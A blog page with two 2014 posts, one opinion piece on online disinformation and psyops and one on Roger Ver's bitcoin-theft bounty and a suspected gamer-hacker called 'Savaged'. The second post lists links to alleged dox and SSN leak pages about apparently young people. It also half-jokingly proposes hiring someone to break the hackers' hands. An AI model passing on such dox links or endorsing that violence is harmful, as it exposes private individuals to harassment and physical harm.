Written by Krypt3ia

2014/09/25 at 11:14

DISINFORMATION and PSYOPS: Corporate, Government, and Personal

leave a comment »

Screenshot from 2014-09-24 10:23:47

The Panopticon and Testbed

266883-1460de6223a90aa772ce84c520719027-medium_jpg

Recent stories online have got me to thinking again about the internet and it’s effects on just about everything. Specifically though of late the idea of how the internet is being used in efforts of control and observation of course have been at the forefront of my mind. Since the revelations of “Snowman” came out just about everyone has had to face the facts that I and many others were saying all along, primarily this; “The internet is a massive and accessible form of control” We are living digitally in a panopticon.

For a long time after the revelation that the MAE West was split and a NARUS STA6400 was placed inline, I have been saying that we all were being surveiled in a driftnet approach to intelligence collection. Some considered me a tinfoil hatter but the reality is that the government has long been using the net as a means of intelligence gathering. Now though there has been a paradigm shift from not only using the internet as a means of surveillance but also as a means of control over the populace.

DISINFORMATION OPERATIONS:

Screenshot from 2014-09-24 10:27:46

One way of controlling a populace is with the use of disinformation. What got me thinking about this though today was an article about how the recent online threats made by alleged hackers against Emma Watson turns out to maybe be a marketing stunt. Evidently a site was set up with a countdown to the release of nudes like those recently dropped by hackers in the “Fappening” The twist here is that in the end the site was just a shill to manipulate people by clickbaiting them and then using that traffic to make money possibly off of ads. There may be other designs behind this site and hoax but it sets a precedent that people should be paying attention to.

In the world of APT (Advanced Persistent Threats) and SE (Social Engineering) this is a common tactic. You bait the user with something that they just have to see and get them to click on something to infect themselves whether that be a file or a website or a link to one. This particular incident is in fact a form of disinformation just like the tweets coming out of ISIS/L trying to scare people into actions or behaviours. In this case the behaviour or action served the purposes of the creators to potentially make quite a bit of money from traffic to a particular site. In other instances this can lead to the compromise of corporations, governments, and end users to steal data such as confidential information or credit cards.

On a grander scheme though you can see the geopolitical actions of disinformation at play with every nation that has available internet access. If you look at the twitter streams and pages of Russia you can see manipulation going on in such cases as the last ill fated Malaysian airliner that was shot from the sky. In fact, the Russians have a very active online Trolling campaign that they use to manipulate people that sometimes is poor enough to just see right through. In other instances the information that is being used is not so easily determined to be skewed or false.

Now consider the whole debate over climate change. Take a look at the “Climategate” incident as well as all of the players involved both government and corporate that have had their hands in the manipulation of public opinion. It’s not just governmental and not just criminal but now a common practice of corporations and I would say has been so since the invention of Advertising and the primacy of Madison Avenue. I suggest you all go watch Mad Men again but not just to watch the unspooling of Don Draper’s life but how the advertising business works.

PSYOPS:

Screenshot from 2014-09-24 10:31:21

PSYOPS on the other hand were more military in origin but then the age of Advertising came along again and started using their precepts as well. In the case of PSYOPS online they are often used by military and government but never count the corporate entities out of the game. Recently it came to light that Facebook carried out some manipulation of it’s users in a program that wanted to see just how much they could change their moods. This experiment was also alleged to be affiliated with the military as well due to funding so you can start to see how it’s a win/win for Zuck right? Manipulate your user base to get them to be pliant and click on ads all the while being a potential pawn in a larger war for hearts and minds for the military?

As I mentioned above this type of warfare is being carried out on Twitter by the likes of ISIS/L as well as the USA. In the case of the US they are trying to troll ISIS and their possible base into “Turning Away” from radical jihad. With both of these cases you can see just how ISIS does this a lot better than the US. However, I would then point you to the chickenhawks all on Fox and other news sources decrying that ISIS is a fundamental threat to the US. Unless you pay attention and do the due diligence reading you may miss that the Pentagon says that ISIS is not as much of a threat to the US (via terrorism) than the current Khorasan group that is an AQ offshoot.

It’s easy to lose the truth between all of the shouting here online and off. Just how much is PSYOP to get a groundswell of support from the likes of the populace and their representatives in Congress is anybodies guess. I for one though think that there is a lot of this going on but too many people focus on the governmental and should start thinking about corporations that now feel empowered to carry out these kinds of campaigns because they have the money and the will to do so.

*cough BIG TOBACCO and OIL cough*

Justsayin.

The New (old) Dystopia:

So what it all comes down to for me is that we all need to be more mindful of this kind of manipulation. Remember too that it was the likes of HB Gary that were offering platforms to automatically manipulate people via social media for intelligence gathering as well as other desired effects. The dystopia kids isn’t just from surveillance but also PSYOPS and DISINFORMATION that manipulates people into actions desired by those carrying them out. In the case of the 4chan hating alleged hackers of Emma Watson’s pictures? Well, I am sure there’s a bank account somewhere with more money in it. I also can assume that there are some people having a real laugh about it as well. What’s more, these people also are feeling very smug because they got all of you to click on a link and do the work for them.

Just remember to vet what you read kids and be mindful that the internet is an open forum to manipulate you as well as your traffic.

K.

Written by Krypt3ia

2014/09/24 at 15:54

Posted in Disinformation, PsyOPS

This Ain’t Cowboy BeBop Ya Know…

with one comment

BigShot1

BITCOIN JESUS

Last week I read a story in Wired about the Bitcoin Jesus Roger Ver’s tribulations and his response to hacking and bitcoin theft. It seems that Roger’s old email account at Hotmail got pwn3d and the attacker then stole some of his bitcoins. Roger had correspondences with the miscreant online and tried to get his bitcoins back but to no avail. It seems that this ersatz hacker is quite the sociopath at heart.

Anyway, Roger got mad as all Jesus’ will do in front of the money lenders or the golden calf and decided to go on his own to find and punish these hackers. He invented his own bounty program! Yes, you heard that right kids. Roger is offering about 20K in bitcoins for information that leads to the arrest and prosecution of the hacker that took his bitcoins. He has had just enough! So the the nets he went and began posting his wanted posters online for a few cases. In his case though he has a particular foe that he is offering some information about to start all you cowboys off with.

savaged

Savaged is one of the alleged identities that Roger has had contact with and believes to be involved in the coin-napping case of his as well as perhaps the Satoshi Nakamoto email hack. Savaged though was the one talking to Roger as you can see in the above linked pastebin conversation on Skype so I went with this one to look into a bit more closely. I know what you are thinking there after that last statement.. You’re thinking I am fancying myself a cowboy right? Well, hey 20k is nothing to sneeze at but no, no I am not in the end and I will explain why down further in this post.

BOUNTY HEADS

140267370677

So Roger had a conversation with someone calling themselves “Savaged” it turns out that once you start the Google and Maltego Fu on this cat you start to see a pattern and it is one I have seen before. See Savaged is one of those Xbox gamer derpheads who started life teabagging his enemies in gameplay and then decided to move on to petty acts of pseudo hacking. What I mean by pseudo hacking is that they go and jack someone’s game ID’s to start by social engineering or password guessing. Once they have had their fill of that they move on to breaking into email accts like Hotmail.

If you ever get the chance to review all of these gamehead’s chats online don’t. Save yourselves because insanity will ensue after reading the completely grammatically incorrect and incoherent drivel out of these teens. It really causes brain damage and I had to stop myself after about a half an hour of looking. The upshot though is that in these conversations you get to peek into the semi private lives of teens on the internets. Part bravado, part ineptitude, and all Lord of the Flies. I just have to ask myself where are these kids parents?

Anyway, you can see lots and lots of their messing about in the following links:

Conversations and Histories:

http://www.wiztracker.net/en/videos/view/X8sDCcOXVVk

http://webcache.googleusercontent.com/search?q=cache:nKfvNVZGzXUJ:www.xboxgamertag.com/search/Savaged/+&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a

http://wilsons.com/dox.txt <—- NOTE: Derpy here is messing around and knows FAMEDGOD ya know, of the SONY DOS and Lizard crew fame? Yeah.. Derpy.

Alleged DOX:

http://pastebin.de/125559

http://pastebin.ru/201cAY9S

http://www.leakedin.com/tag/us-ssn/page/10/

http://pastebin.com/azbgWvBU

GAMERZ, JACKERZ, AND DERPHEADS

Finished hitting your head against the desk yet?…

So here’s my thing with these skidz.. They are an annoyance and not much more. Sure, someone jacked Rogers accts and then stole his bitcoins but it’s also kinda Roger’s fault for not securing those accts right? I mean 2FA now is easier to get but then again if it was a vuln in the validation process for lost passwords etc well that’s hotmail’s fault no matter what Apple says about iCloud’s hack right? *poke poke*

The upshot is that all these kids are just unmanageable fucktards who get away with all kinds of shit because they are “youthful offenders” and the cops are usually 5 steps behind the times in how the internets work. After dealing with them in the past and looking at this crew here I can give you a basic rundown of how the operate;

They do anything they want because they can. Mostly because they have Sociopathic behavior due to Disinhibition Syndrome

These kids just are pathological most of the time and it seems since like Joseph Campbell pointed out many years ago, we lack rights of passage that have meaning anymore as well as today’s parents seem to be disengaged. Of course I am no Cyber Psychiatrist *snerk* The reality is though that you can approach these kids reasonably and still get bitten, kinda like Roger does in that conversation linked above.

Until such time as the cops and the law catch up with the crimes being committed by these kids (SWAT-ing, jacking, petty online thefts) and put a stop to it they will just continue on and eventually move on to other more onerous crimes down the line as they get older and more tech savvy. This is my sad assessment of it all and for this and other reasons I will outline below I have decided to not be a Cowboy and try to collect a bounty on these bounty heads.

SEE YOU SPACE COWBOY

Roger, buddy, pal, give up on this pipe dream of bounties and maybe go for more a letter of marque instead. You are relying on cops who may not care and unless these crimes are federal you aren’t going to get much play from the law. Even if I or others were able to cobble together enough information to warrant a warrant for the FBI I seriously doubt they would move on anything and here’s why.

  • Attribution is hard
  • Proof is hard to get unless you seize their systems and PROVE hands on terminals
  • DOX just won’t cut it and that is about all you will have with cowboy’s out there… Well, unless they hack these guys and then you have a whole taint issue…

No Roger, I think if you really want action you are much better off going to the darknets and hiring yourself a leg breaker. Well, in this case really just a hand breaker. If you were to get the dox and feel assured that your target was in fact your target then just have their hands broken. No hands to type, no hacky hacky your shit right? I know some of you out there are like

“ERMEGERD! WHAT IS HE ADVOCATING!”

Well, it’s the truth right? I mean these little shit’s wont learn unless they are either incarcerated in jail, in a mental facility, or maybe, just maybe sitting in front of a keyboard with broken hands and wrists because they done fucked up. Now am I really saying that you Roger should hire some mechanic to whack these kids? Well, no, that would be bad of me. However, I think my point comes across pretty well in the farcical scenario right?

YOU AND YOUR BOUNTY PROGRAM WILL NOT WORK ROGER SO PLEASE LICK YOUR WOUNDS, SECURE YOUR SHIT, AND MOVE ON.

Simple enough?

K.

Written by Krypt3ia

2014/09/20 at 15:05

Follow

Get every new post delivered to your Inbox.

Join 135 other followers